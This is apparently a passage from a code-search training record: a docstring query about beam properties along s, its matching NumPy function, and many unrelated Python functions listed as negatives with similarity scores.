90*144=12960\n mvta = numpy.sum( mv.__array__(), axis=0 )\n mvta /= n\n return mvta", "def reverseString(self, s):\n for i in range(len(s)//2):\n s[i], s[-(i+1)] = s[-(i+1)], s[i]", "def reverseString1(self, s):\n for i in range(len(s)//2):\n s[i], s[~i] = s[~i], s[i]", "def decodeSpaceTime(self, result):\r\n if self.case == 1:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(x[0]/self.scale))),\r\n reader.morton2coordsX2D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY2D(x[1], self.offy, self.scaley, self.roundNum), x[2]], result)\r\n else:\r\n return map(lambda x: [int(x[0]/self.scale), reader.morton2coordsX2D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY2D(x[1], self.offy, self.scaley, self.roundNum), x[2]], result)\r\n elif self.case == 2:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(x[0]/self.scale))), \r\n reader.morton2coordsX3D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY3D(x[1], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ3D(x[1], self.offz, self.scalez, self.roundNum)], result)\r\n else:\r\n return map(lambda x: [int(x[0]/self.scale), reader.morton2coordsX3D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY3D(x[1], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ3D(x[1], self.offz, self.scalez, self.roundNum)], result)\r\n elif self.case == 3:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(reader.morton2coordst3D(x[0])/self.scale))), \r\n reader.morton2coordsY3D(x[0], self.offx, self.scalex, self.roundNum),\r\n reader.morton2coordsZ3D(x[0], self.offy, self.scaley, self.roundNum), x[1]], result)\r\n else:\r\n return map(lambda x: [int(reader.morton2coordst3D(x[0])/self.scale), \r\n reader.morton2coordsY3D(x[0], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsZ3D(x[0], self.offy, self.scaley, self.roundNum), x[1]], result)\r\n elif self.case == 4:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(reader.morton2coordst4D(x[0])/self.scale))), \r\n reader.morton2coordsX4D(x[0], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY4D(x[0], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ4D(x[0], self.offz, self.scalez, self.roundNum)], result)\r\n else:\r\n return map(lambda x: [int(reader.morton2coordst4D(x[0])/self.scale), \r\n reader.morton2coordsX4D(x[0], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY4D(x[0], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ4D(x[0], self.offz, self.scalez, self.roundNum)], result)", "def _getLilyDuration(self, alignBeat = None):\n # To tie notes, we can simply replace the duration with power-of-two\n # durations (or dotted durations) with tildes (~) between them.\n if self.duration == None:\n return \"\"\n if self._isBasisDuration():\n return int(1/self.getDurationNoDot())\n length = self.duration # non-reciprocal units\n nNotes = self.parseBeatLength(length)\n nNotes = [x for x in nNotes] # Need to convert tuple to a list to modify contents\n #print(\"1: {}\\n1/2: {}\\n1/4: {}\\n1/8: {}\\n1/16: {}\\n1/32: {}\\n1/64: {}\".format(\n # nNotes[0], nNotes[1], nNotes[2], nNotes[3], nNotes[4], nNotes[5], nNotes[6]))\n ll = []\n candot = False\n tieSymbol = \"\" # This will be populated 
later (this hack is to work around the dotted note)\n if alignBeat != None: # If we're considering the alignment beat,\n nBeats = self.parseBeatLength(alignBeat) # Parse the alignment beat count\n shortestBeat = 0\n for n in range(len(nBeats)): # Find the shortest non-zero beat duration\n if nBeats[-(n+1)] > 0: # i.e. if we're on beat 2.5 of 4/4 (alignBeat = 1/4 + 1/4 + 1/8 = 1/2 + 1/8,\n shortestBeat = len(nBeats) - (n + 1) # the shortest beat is 1/8\n if nNotes[shortestBeat] > 0: # If the note duration includes this shortest beat, let's start with that one\n ll.append(str(2**shortestBeat)) # Append it to the lily list\n nNotes[shortestBeat] = 0 # Then blank it out of the loop\n tieSymbol = self._lilyTie # Set the tie symbol for subsequent items in the list\n \n for n in range(len(nNotes)): # Walk through the breakdown of the note duration, starting from whole notes\n if nNotes[n] > 0: # If a duration exists,\n if candot: # If the last duration exists, we can dot it!\n candot = False # Then we turn off dotting so we don't end up with double-dots\n ll.append('.') # (those are silly)\n else:\n candot = True # The next note can be a dot if present\n durationInt = 2**n # 4 for quarter note, 8 for eighth note, etc...\n ll.append(\"{}{}\".format(tieSymbol, str(durationInt)))\n tieSymbol = self._lilyTie # Once the first symbol has been added to lily list, set the tie symbol\n else:\n candot = False # The next note cannot be a dot\n return \"\".join(ll)", "def trackBunchTurns(self, bunch):\n\t\tturns = self.__turns\n\t\t#start\n\t\tfor i in range(turns-1):\t\t\t\n\t\t\tself.trackBunch(bunch)\t\n\t\t\tsyncPart = bunch.getSyncParticle()\n\t\t\ttime = syncPart.time()\n\t\t\tself.setTimeDepStrength(time)\n\t\t\tprint \"debug trackBunchTurns time\",time,\"in\",i,\"turn\"\n\t\t#getsublattice\n\t\t#sublattice.trackBunch(bunch)", "def lrs(st):\n\n length, shifts = __lrs(st.root, 0)\n result = [length, []]\n for shift in shifts:\n lrs_string = st.text[shift[0]-length:shift[0]]\n result[1].append((lrs_string, [x-length for x in shift]))\n return result", "def stepify(times, values):\n new_times = np.empty((2*times.size - 1,))\n new_values = np.empty_like(new_times)\n new_times[::2] = times\n new_times[1::2] = times[1:]\n new_values[::2] = values\n new_values[1::2] = values[:-1]\n return new_times, new_values", "def detransform_from_seconds_without_intraday_gaps(transformed_seconds, market_hours: ul.MarketHours, fake_daily_minutes_gap = 60):\n timestamps = []\n \n for i in range(transformed_seconds.size):\n timestamps.append(transformed_seconds[i,0])\n return timestamps", "def id2segtimes(sid, ann_type=\"uppercase\", salamipath=dpath.SALAMI):\n files = id2filenames(sid, ann_type=ann_type, salamipath=salamipath)\n times = []\n for i in range(len(files)):\n events, _ = mir_eval.io.load_labeled_events(files[i])\n times = times + events[1:-1].tolist()\n return times", "def time_to_frames(times, sr=22050, hop_length=512, n_fft=None):\n\n samples = time_to_samples(times, sr=sr)\n\n return samples_to_frames(samples, hop_length=hop_length, n_fft=n_fft)", "def conv_time(l, h):\n\t# Function modified from post on ActiveState by John Nielsen\n\n\t#converts 64-bit integer specifying the number of 100-nanosecond\n\t#intervals which have passed since January 1, 1601.\n\t#This 64-bit value is split into the\n\t#two 32 bits stored in the structure.\n\td = 116444736000000000L \n\n\t# Some LNK files do not have time field populated \n\tif l + h != 0:\n\t\tnewTime = (((long(h) << 32) + long(l)) - d)/10000000 
\n\telse:\n\t\tnewTime = 0\n\n\treturn time.strftime(\"%Y/%m/%d %H:%M:%S %a\", time.localtime(newTime))", "def convert_from_seconds(s):\n days = s // (24 * 3600) #Het aantal dagen\n time = s % (24 * 3600)\n hours = time // 3600\n time %= 3600\n minutes = time // 60\n time %= 60\n seconds = time\n return [days, hours, minutes, seconds]", "def shift_list(array, s):\n # Calculate acutal shift amount (e.g. 11 --> 1 if lenght of the array is 5)\n s %= len(array)\n\n # reverse the shift direction to be more intuitive\n s *= -1\n\n #shift arry with slicing\n shifted_array = array[s:] + array[:s]\n\n return shifted_array", "def trans_times_to_seg_times(trans_times):\n seg_times = np.diff(trans_times)\n return seg_times", "def _fancy_to_raw(sheng):\n raw_sheng = []\n for entry in sheng:\n raw_entry = list(entry[:6])\n raw_entry[0] += 1\n raw_entry[1] += 1\n raw_entry[2] += 1\n raw_sheng.append(raw_entry)\n\n return raw_sheng", "def _s2bl(size):\n return size**2 // 8 + 1", "def stump(t, n, angle=90):\n lt(t)\n fd(t, n)\n rt(t, angle)", "def ns_tarray_to_sFlat2(t_arr, DEPTH = 2):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n sflat.append([])\n sflat[i].append([0 for _ in range(DEPTH)])\n \n tm, dep = -1, 0 # tm -1 initiator\n \n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH: \n dep = 0\n # tm += 1\n # sflat[i].append([0 for _ in range(SPREAD)])\n if ctime == t_arr[i, j, 0] and dep == 0: \n continue\n elif ctime != t_arr[i, j, 0]:\n sflat[i].append([0 for _ in range(DEPTH)])\n tm += 1\n dep = 0\n\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n \n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH), dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr", "def square(t, length):\n for i in range(4):\n t.fd(length)\n t.lt(90)", "def utlibr(time):\n\n if time.size == 1:\n return iers.utlibr(time.tt.mjd)\n else:\n # Only loop over unique epochs\n _, idx, r_idx = np.unique(np.asarray(time), return_index=True, return_inverse=True)\n return np.array([iers.utlibr(t.tt.mjd) for t in time[idx]])[r_idx]", "def time_period(s,h=30):\n\n t = 0\n\n old_z, pass_1 = 0, None\n\n while(True):\n k1 = h*sdot(s)\n k2 = h*sdot(s+k1/2)\n k3 = h*sdot(s+k2/2)\n k4 = h*sdot(s+k3)\n\n s = s+(k1+2*k2+2*k3+k4)/6\n t = t+h\n\n if (s[2]>=0 and old_z<0):\n dt = -s[2]/s[5]\n t2 = t+dt\n\n if pass_1 is None:\n pass_1 = t2\n else:\n return t2-pass_1\n\n old_z = s[2]", "def adjust_layer_temps(self):\n\n if self.layer_count == 1:\n self.t_s_0 = self.new_tsno(\n self.m_s_0,\n self.t_s_0,\n self.cc_s_0)\n self.t_s = self.t_s_0\n\n elif self.layer_count == 2:\n if self.isothermal:\n self.t_s = FREEZE\n self.t_s_l = FREEZE\n self.t_s_0 = FREEZE\n else:\n self.t_s_0 = self.new_tsno(\n self.m_s_0,\n self.t_s_0,\n self.cc_s_0)\n self.t_s_l = self.new_tsno(\n self.m_s_l,\n self.t_s_l,\n self.cc_s_l)\n self.t_s = self.new_tsno(\n self.m_s,\n self.t_s,\n self.cc_s)", "def ltos(n):\r\n s = ''\r\n for x in (2**24, 2**16, 2**8):\r\n quot, rem = (n/x, n%x)\r\n s += chr(quot)\r\n n = rem\r\n s += chr(n % 256)\r\n return s", "def OPCtimetransformOld(data, to):\n outtimes = []\n \n times = {\n 
'ms':[],\n 'SS':[],\n 'MM':[],\n 'HH':[]\n }\n for i in range(0, len(data)):\n item = data[i]\n try: \n times['HH'].append(int(item[0:2]))\n times['MM'].append(int(item[2:4]))\n times['SS'].append(int(item[4:6]))\n times['ms'].append(int(item[7:9]))\n except ValueError:\n # strange value 2319010.00 in 201129 file...\n olditem = item\n newitem = item[:4] + item[4+1:]\n print( ('Repairing strange value %s into %s')%(olditem, newitem) )\n try:\n times['HH'].append(int(newitem[0:2]))\n times['MM'].append(int(newitem[2:4]))\n times['SS'].append(int(newitem[4:6]))\n times['ms'].append(int(newitem[7:9]))\n except ValueError:\n print(newitem)\n\n # OPC times go up to 60 minutes. This is corrected by moving one minute\n times['MM'] = [max(0,x-1) for x in times['MM']]\n times['SS'] = [max(0,x-1) for x in times['SS']]\n\n for i in range(0, len(data)):\n md = dt.datetime(1900,1,1,times['HH'][i], times['MM'][i], times['SS'][i]) \n outtimes.append( dt.datetime.strftime(md, to))\n\n return outtimes", "def time_convert(intime):\n Nt = intime.shape[0]\n outtime = []\n for t in range(Nt):\n timestr = ''.join([intime[t,:][~intime[t,:].mask].data[i].decode('utf-8') for i in range(len(intime[t,:][~intime[t,:].mask].data))])\n outtime.append(datetime.strptime(timestr, '%Y-%m-%d_%H:%M:%S'))\n return outtime", "def sfreq_to_times(gaze_array, sfreq, start_time=0):\n return np.arange(0, len(gaze_array) / sfreq, 1. / sfreq) + start_time", "def boxcox_reverse(x_t, lam):\n\n orig_scale = (lam*x_t + 1)**(1/lam)\n orig_scale = (orig_scale.fillna(0)).transpose('time', 'lat', 'lon')\n\n return orig_scale", "def twiddle_normal_to_fast_format(twiddle):\n twiddle = twiddle.clone()\n nstack = twiddle.shape[0]\n n = twiddle.shape[2] * 2\n m = int(math.log2(n))\n twiddle[:, :, :, 1] = twiddle[:, :, :, 1, [1, 0]]\n twiddle_list = []\n for i in range(m):\n stride = 1 << i\n new_twiddle = twiddle[:, i]\n new_twiddle = new_twiddle.reshape(nstack, n // 2 // stride, stride, 2, 2)\n new_twiddle = new_twiddle.permute(0, 1, 3, 2, 4)\n new_twiddle = new_twiddle.reshape(nstack, n, 2).transpose(1, 2)\n twiddle_list.append(new_twiddle)\n result = torch.stack(twiddle_list, dim=1)\n return result", "def trc_prep(self,m,ds,s,mode=2):\n m_out=np.zeros((m.shape[0],11*ds+1))\n if mode==1:\n for i,j in enumerate(m):\n m_out[i,:]=np.hstack((m[i,1*s-ds:1*s],m[i,2*s-ds:2*s],m[i,3*s-ds:3*s],m[i,4*s-ds:4*s],m[i,5*s-ds:5*s],m[i,6*s-ds:6*s],m[i,7*s-ds:7*s],m[i,8*s-ds:8*s],m[i,9*s-ds:9*s],m[i,10*s-ds:10*s],m[i,11*s-ds:11*s],m[i,11*s]))\n elif mode==2:\n for i,j in enumerate(m):\n m_out[i,:]=np.hstack((m[i,0*s:0*s+ds],m[i,1*s:1*s+ds],m[i,2*s:2*s+ds],m[i,3*s:3*s+ds],m[i,4*s:4*s+ds],m[i,5*s:5*s+ds],m[i,6*s:6*s+ds],m[i,7*s:7*s+ds],m[i,8*s:8*s+ds],m[i,9*s:9*s+ds],m[i,10*s:10*s+ds],m[i,11*s]))\n return m_out", "def long_training_sequence():\n\n symbol = np.fft.ifft(long_training_symbol())\n full_long_time = np.concatenate([symbol[32:], symbol, symbol]) # two symbols plus 32 samples of GI\n return full_long_time.tolist()", "def reverseString1(s: List[str]) -> None:\n len_of_s = len(s)\n for i in range(len_of_s // 2):\n start = i\n end = len_of_s - start - 1\n if start >= end:\n return\n s[start], s[end] = s[end], s[start]\n\n # 시간복잡도 = O(n)", "def _ls2nms(self, ls):\n nms = []\n for l in ls:\n if l % 2 == 1:\n # max(m) < l\n nms += [(l, m) for m in range(0, l, 2)]\n else:\n # max(m) == l\n nms += [(l, m) for m in range(0, l+1, 2)]\n return nms", "def make_lattice(s):\n n = s*s\n g = Graph(n)\n\n for v in range(n):\n if v % s == 0:\n continue\n g.add_edge(v, 
v+1)\n if v > s*s-s:\n continue\n g.add_edge(v, v+s)\n g.add_edge(v+1, v+s+1)\n return 1, g, n", "def calc_time(directions_result):\n\n # there is only one leg\n legs = directions_result[\"legs\"][0][\"steps\"]\n\n steps = map(lambda x: (x[\"travel_mode\"], x[\"start_location\"], x[\"end_location\"]), legs)\n\n walking = filter(lambda x: x[0] == \"WALKING\", steps)\n transit = filter(lambda x: x[0] == \"TRANSIT\", steps)\n\n\n walking_to_biking = map(lambda x: gmaps.directions(\n x[1], x[2],\n mode=\"bicycling\"), walking)\n\n transit_final = map(lambda x: gmaps.directions(\n x[1], x[2], mode=\"transit\"), transit)\n\n\n walking_addrs = map(lambda x : (x[0][\"legs\"][0][\"start_address\"], x[0][\"legs\"][0][\"end_address\"]), walking_to_biking)\n transit_addrs = map(lambda x : (x[0][\"legs\"][0][\"start_address\"], x[0][\"legs\"][0][\"end_address\"]), transit_final)\n\n all_legs = map(lambda x:\n sum(map(lambda y: y[\"duration\"][\"value\"], x[0][\"legs\"]))\n ,walking_to_biking+transit_final)\n\n final = zip(all_legs, walking+transit, walking_addrs+transit_addrs)\n\n\n def reconstruct():\n w,t = 0,len(walking)\n arr = []\n for i in xrange(len(all_legs)):\n if steps[i][0] == \"TRANSIT\":\n arr.append(final[t])\n t += 1\n else:\n arr.append(final[w])\n w += 1\n return arr\n\n\n total_time = sum(all_legs) \n\n return total_time, reconstruct()", "def reverseString(self, s: List[str]) -> None:\n size = len(s)\n for i in range(size//2):\n s[i], s[~i] = s[~i], s[i]\n # s[i], s[size-i-1] = s[size-i-1], s[i]\n\n # s[:] = s[::-1]", "def getTimes():", "def getTimes():", "def getTimes():", "def diffsents(sa, sb):\n m = len(sa)\n n = len(sb)\n la = lb = 0\n ra = m - 1\n rb = n - 1\n while la < m and lb < n:\n if sa[la] == sb[lb]:\n la += 1\n lb += 1\n else:\n break\n while ra >= 0 and rb >= 0:\n if sa[ra] == sb[rb]:\n ra -= 1\n rb -= 1\n else:\n break\n while la > ra or lb > rb:\n # la -= 1\n ra += 1\n # lb -= 1\n rb += 1\n if la == ra == m or lb == rb == n:\n la -= 1\n ra -= 1\n lb -= 1\n rb -= 1\n assert 0 <= la <= ra < m, \"{}\\t{}\\t{}\\t{}\\t{}\".format(m, la, ra, sa, sb)\n assert 0 <= lb <= rb < n, \"{}\\t{}\\t{}\\t{}\\t{}\".format(n, lb, rb, sb, sa)\n # sa[la, ra+1], sb[lb, rb+1]\n return la, ra, lb, rb", "def diffsents(sa, sb):\n m = len(sa)\n n = len(sb)\n la = lb = 0\n ra = m - 1\n rb = n - 1\n while la < m and lb < n:\n if sa[la] == sb[lb]:\n la += 1\n lb += 1\n else:\n break\n while ra >= 0 and rb >= 0:\n if sa[ra] == sb[rb]:\n ra -= 1\n rb -= 1\n else:\n break\n while la > ra or lb > rb:\n # la -= 1\n ra += 1\n # lb -= 1\n rb += 1\n if la == ra == m or lb == rb == n:\n la -= 1\n ra -= 1\n lb -= 1\n rb -= 1\n assert 0 <= la <= ra < m, \"{}\\t{}\\t{}\\t{}\\t{}\".format(m, la, ra, sa, sb)\n assert 0 <= lb <= rb < n, \"{}\\t{}\\t{}\\t{}\\t{}\".format(n, lb, rb, sb, sa)\n # sa[la, ra+1], sb[lb, rb+1]\n return la, ra, lb, rb", "def build_zigzag_times(rips,n,numbins):\n times = [[] for x in range(0,rips.__len__())]\n i=0\n for x in rips:\n dim = x.dimension()\n t = [];\n for k in range(0,dim+1):\n t.append(x[k])\n xmin = math.floor(min(t)/n)\n xmax = math.floor(max(t)/n)\n if xmax == 0:\n bd = [0,1]\n elif xmin == numbins-1:\n bd = [2*xmin-1,2*xmin]\n elif xmax == xmin:\n bd = [2*xmin-1,2*xmin+1]\n elif xmax > xmin:\n bd = [2*xmax-1,2*xmax-1]\n else:\n print(\"Something has gone horribly wrong!\")\n times[i] = bd\n i = i+1\n return times", "def extend(self, s):\n newTimeExtent = int(s + 1 - 1e-10)\n if newTimeExtent > self.timeExtent:\n for s in xrange(self.timeExtent , newTimeExtent):\n 
self.drawSecond(s)\n self.timeExtent = newTimeExtent\n self.resize(newTimeExtent * self.scale, self.height)\n for f in self.resizeCallbacks:\n f()", "def time_decode(self):\n for ii in range(100):\n msg = DIMSEMessage()\n for fragment in self.fragments:\n msg.decode_msg(fragment)", "def _to(\n self, state: List[np.ndarray], reset: bool\n ) -> Union[TimeStep, Tuple[Any, np.ndarray, np.ndarray, Any]]:", "def dnds_to_ngts(s_vector, dnds):\n delta_s = s_vector[1] - s_vector[0]\n revngts = np.cumsum(dnds[::-1]) * delta_s\n return revngts[::-1]", "def bson_ts_to_long(timestamp):\n converted_time = (timestamp.time << 32) + timestamp.inc\n return converted_time", "def sundial_time(cls, tee):\n date = Clock.fixed_from_moment(tee)\n time = mod(tee, 1)\n q = ifloor(4 * time)\n if q == 0:\n a = cls.sunset(date - 1)\n b = cls.sunrise(date)\n t = Clock.days_from_hours(-6)\n elif q == 3:\n a = cls.sunset(date)\n b = cls.sunrise(date + 1)\n t = Clock.days_from_hours(18)\n else:\n a = cls.sunrise(date)\n b = cls.sunset(date)\n t = Clock.days_from_hours(6)\n return a + (2 * (b - a) * (time - t))", "def shifter(self):\n #self.BA_shift = self.timeshift_latitude(self.latB, self.latA)\n #self.BC_shift = self.timeshift_latitude(self.latB, self.latC)\n\n\n self.shifted = True #changing boolean to True when function is called.\n\n secondsA = self.secondsA\n secondsB = self.secondsB\n secondsC = self.secondsC\n\n NeA = self.holefill(self.NeA, secondsA)\n NeB = self.holefill(self.NeB, secondsB)\n NeC = self.holefill(self.NeC, secondsC)\n\n start = 0\n stop = len(NeA) - np.max(np.array([self.BA_shift, self.BC_shift]))\n\n startA = start + self.BA_shift\n stopA = stop + self.BA_shift\n\n startC = start + self.BC_shift\n stopC = stop + self.BC_shift\n\n NeA = NeA[startA:stopA]\n NeB = NeB[start:stop]\n NeC = NeC[startC:stopC]\n\n longA = self.holefill(self.longA, secondsA)\n longB = self.holefill(self.longB, secondsB)\n longC = self.holefill(self.longC, secondsC)\n longA = longA[startA:stopA]\n longB = longB[start:stop]\n longC = longC[startC:stopC]\n\n latA = self.holefill(self.latA, secondsA)\n latB = self.holefill(self.latB, secondsB)\n latC = self.holefill(self.latC, secondsC)\n latA = latA[startA:stopA]\n latB = latB[start:stop]\n latC = latC[startC:stopC]\n\n radA = self.holefill(self.radA, secondsA)\n radB = self.holefill(self.radB, secondsB)\n radC = self.holefill(self.radC, secondsC)\n radA = radA[startA:stopA]\n radB = radB[start:stop]\n radC = radC[startC:stopC]\n\n velA = self.holefill(self.velA, secondsA)\n velB = self.holefill(self.velB, secondsB)\n velC = self.holefill(self.velC, secondsC)\n velA = velA[startA:stopA]\n velB = velB[start:stop]\n velC = velC[start:stop]\n\n altA = self.holefill(self.altA, secondsA)\n altB = self.holefill(self.altB, secondsB)\n altC = self.holefill(self.altC, secondsC)\n altA = altA[startA:stopA]\n altB = altB[start:stop]\n altC = altC[startC:stopC]\n\n\n mlatA = self.holefill(self.mlatA, secondsA)\n mlatB = self.holefill(self.mlatB, secondsB)\n mlatC = self.holefill(self.mlatC, secondsC)\n mlatA = mlatA[startA:stopA]\n mlatB = mlatB[start:stop]\n mlatC = mlatC[startC:stopC]\n\n mlongA = self.holefill(self.mlongA, secondsA)\n mlongB = self.holefill(self.mlongB, secondsB)\n mlongC = self.holefill(self.mlongC, secondsC)\n mlongA = mlongA[startA:stopA]\n mlongB = mlongB[start:stop]\n mlongC = mlongC[startC:stopC]\n\n mltA = self.holefill(self.mltA, secondsA)\n mltB = self.holefill(self.mltB, secondsB)\n mltC = self.holefill(self.mltC, secondsC)\n mltA = mltA[startA:stopA]\n 
mltB = mltB[start:stop]\n mltC = mltC[startC:stopC]\n\n secondsA = self.holefill(secondsA, secondsA)\n secondsB = self.holefill(secondsB, secondsB)\n secondsC = self.holefill(secondsC, secondsC)\n secondsA = secondsA[startA:stopA]\n secondsB = secondsB[start:stop]\n secondsC = secondsC[startC:stopC]\n\n indsA = np.nonzero(secondsA)[0]\n indsB = np.nonzero(secondsB)[0]\n indsC = np.nonzero(secondsC)[0]\n\n inds = np.intersect1d(indsA, indsB)\n inds = np.intersect1d(inds, indsC)\n\n self.NeA = NeA[inds]\n self.NeB = NeB[inds]\n self.NeC = NeC[inds]\n\n self.longA = longA[inds]\n self.longB = longB[inds]\n self.longC = longC[inds]\n\n self.latA = latA[inds]\n self.latB = latB[inds]\n self.latC = latC[inds]\n\n self.radA = radA[inds]\n self.radB = radB[inds]\n self.radC = radC[inds]\n\n self.velA = velA[inds]\n self.velB = velB[inds]\n self.velC = velC[inds]\n\n self.altA = altA[inds]\n self.altB = altB[inds]\n self.altC = altC[inds]\n\n self.mlatA = mlatA[inds]\n self.mlatB = mlatB[inds]\n self.mlatC = mlatC[inds]\n\n self.mlongA = mlongA[inds]\n self.mlongB = mlongB[inds]\n self.mlongC = mlongC[inds]\n\n self.mltA = mltA[inds]\n self.mltB = mltB[inds]\n self.mltC = mltC[inds]\n\n self.secondsA = secondsA[inds]\n self.secondsB = secondsB[inds]\n self.secondsC = secondsC[inds]", "def _normalizeTime(self, t : float) -> float:\n return (t - self.t0)/self.tau", "def reverseString(self, s) -> None:\n # n=len(s)\n # for i in range(int(n/2)):\n # s[i],s[n-1-i]=s[n-1-i],s[i]\n s=s[::-1]\n print(s)", "def _STEPS2TIME(step):\n return step/1000.", "def inverseLaplace(Y_s,t=None):\n \n # load the step response as a system in scipy.signal\n num,den = symToTransferFn(Y_s)\n \n # evaluate in time domain\n t,y = sp.impulse((num,den),T=t)\n return t,y", "def decode_longs(data_structure):\n return walk_tree(str_to_long, data_structure)", "def _make_historical_mat_time(\n deltas: np.ndarray,\n changepoints_t: np.ndarray,\n n_row: int,\n single_diff: float,\n) -> Tuple[np.ndarray, np.ndarray]:\n prev_time = np.arange(0, 1 + single_diff, single_diff)\n idxs = []\n for changepoint in changepoints_t:\n idxs.append(np.where(prev_time > changepoint)[0][0])\n prev_deltas = np.zeros(len(prev_time))\n prev_deltas[idxs] = deltas\n prev_deltas = np.repeat(prev_deltas.reshape(1, -1), n_row, axis=0)\n return prev_deltas, prev_time", "def transform_to_seconds_without_intraday_gaps(timestamps: pd.DatetimeIndex, market_hours: ul.MarketHours, fake_daily_minutes_gap = 60):\n\n n_timestamps = timestamps.size\n transformed_seconds = np.zeros((n_timestamps,1))\n timestamps = ul.convert2dt(timestamps)\n for i in range(n_timestamps):\n transformed_seconds[i,0] = market_hours.to_seconds_since_origin_without_intraday_gaps(timestamps[i], fake_daily_minutes_gap)\n \n return transformed_seconds" ]
[ "0.5729294", "0.535365", "0.5282586", "0.52594215", "0.5227779", "0.5178457", "0.51595366", "0.507217", "0.5067364", "0.50368345", "0.5025668", "0.49911958", "0.49690363", "0.49690363", "0.49686134", "0.4950423", "0.490032", "0.4897815", "0.48929238", "0.4863648", "0.4863037", "0.48580927", "0.4857599", "0.4852297", "0.4812424", "0.47922513", "0.47916633", "0.4785798", "0.47652596", "0.47651666", "0.47647715", "0.47375464", "0.47330213", "0.4731381", "0.47208524", "0.47095153", "0.47052705", "0.4700582", "0.4700315", "0.4691642", "0.46910304", "0.46868083", "0.4678329", "0.46522412", "0.4651215", "0.46445388", "0.46360865", "0.46228248", "0.4617045", "0.46138903", "0.4613504", "0.46031696", "0.4601545", "0.46011484", "0.45896104", "0.45789918", "0.45765463", "0.4574678", "0.4571693", "0.45690617", "0.45685166", "0.45663363", "0.4564176", "0.45633382", "0.45587415", "0.4556317", "0.4551879", "0.45505613", "0.4550204", "0.4549725", "0.4548361", "0.45475507", "0.45440668", "0.45418063", "0.4541134", "0.45394292", "0.4529518", "0.45288932", "0.45278206", "0.45243275", "0.45243075", "0.45243075", "0.45243075", "0.45232236", "0.45232236", "0.45222136", "0.4518785", "0.45153716", "0.4514397", "0.4510865", "0.45101738", "0.45090884", "0.4508093", "0.4498395", "0.44959283", "0.44957903", "0.44858718", "0.44752252", "0.4456938", "0.44483522" ]
0.49709463
12
We use this function to analyze the beam properties along s.
def beam_property_along_s(ps, id_slices):
    prop_s = np.zeros((14, len(id_slices)))
    for n in range(len(id_slices)):
        ps_s = np.take(ps, id_slices[n], axis=1)
        prop_s[0, n] = np.average(ps_s[0,:])
        prop_s[1, n] = np.average(ps_s[1,:])
        prop_s[2, n] = np.average(ps_s[2,:])
        prop_s[3, n] = np.average(ps_s[3,:])
        prop_s[4, n] = np.std(ps_s[0,:])
        prop_s[5, n] = np.std(ps_s[2,:])
        prop_s[6:, n] = emittance_and_twiss(ps_s)
    return prop_s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prt_beam_prms(self):\n print '\\nIon Charge States = ', self.M.conf()['IonChargeStates']\n print 'IonEs [MeV] = ', self.M.conf()['IonEs']/1e6\n print 'IonEk [MeV] = ', self.M.conf()['IonEk']/1e6\n print '\\nBaryCenter 0:\\n', self.M.conf()['BaryCenter0']\n print '\\nBaryCenter 1:\\n', self.M.conf()['BaryCenter1']\n print '\\nBeam Envelope 0:\\n', self.M.conf()['S0']\n print '\\nBeam Envelope 1:\\n', self.M.conf()['S1']", "def calc_IAM_beam_SC(Az_vector, g_vector, ha_vector, teta_z, tilt_angle, type_SCpanel, Sz_vector, latitude):\n\n def calc_teta_L(Az, teta_z, tilt, Sz):\n teta_la = tan(Sz) * cos(teta_z - Az)\n teta_l = degrees(abs(atan(teta_la) - tilt))\n if teta_l < 0:\n teta_l = min(89, abs(teta_l))\n if teta_l >= 90:\n teta_l = 89.999\n return teta_l # longitudinal incidence angle in degrees\n\n def calc_teta_T(Az, Sz, teta_z):\n teta_ta = sin(Sz) * sin(abs(teta_z - Az))\n teta_T = degrees(atan(teta_ta / cos(teta_ta)))\n if teta_T < 0:\n teta_T = min(89, abs(teta_T))\n if teta_T >= 90:\n teta_T = 89.999\n return teta_T # transversal incidence angle in degrees\n\n def calc_teta_L_max(teta_L):\n if teta_L < 0:\n teta_L = min(89, abs(teta_L))\n if teta_L >= 90:\n teta_L = 89.999\n return teta_L\n\n def calc_IAMb(teta_l, teta_T, type_SCpanel):\n if type_SCpanel == 'FP': # # Flat plate collector 1636: SOLEX BLU, SPF, 2012\n IAM_b = -0.00000002127039627042 * teta_l ** 4 + 0.00000143550893550934 * teta_l ** 3 - 0.00008493589743580050 * teta_l ** 2 + 0.00041588966590833100 * teta_l + 0.99930069929920900000\n if type_SCpanel == 'ET': # # evacuated tube Zewotherm ZEWO-SOL ZX 30, SPF, 2012\n IAML = -0.00000003365384615386 * teta_l ** 4 + 0.00000268745143745027 * teta_l ** 3 - 0.00010196678321666700 * teta_l ** 2 + 0.00088830613832779900 * teta_l + 0.99793706293541500000\n IAMT = 0.000000002794872 * teta_T ** 5 - 0.000000534731935 * teta_T ** 4 + 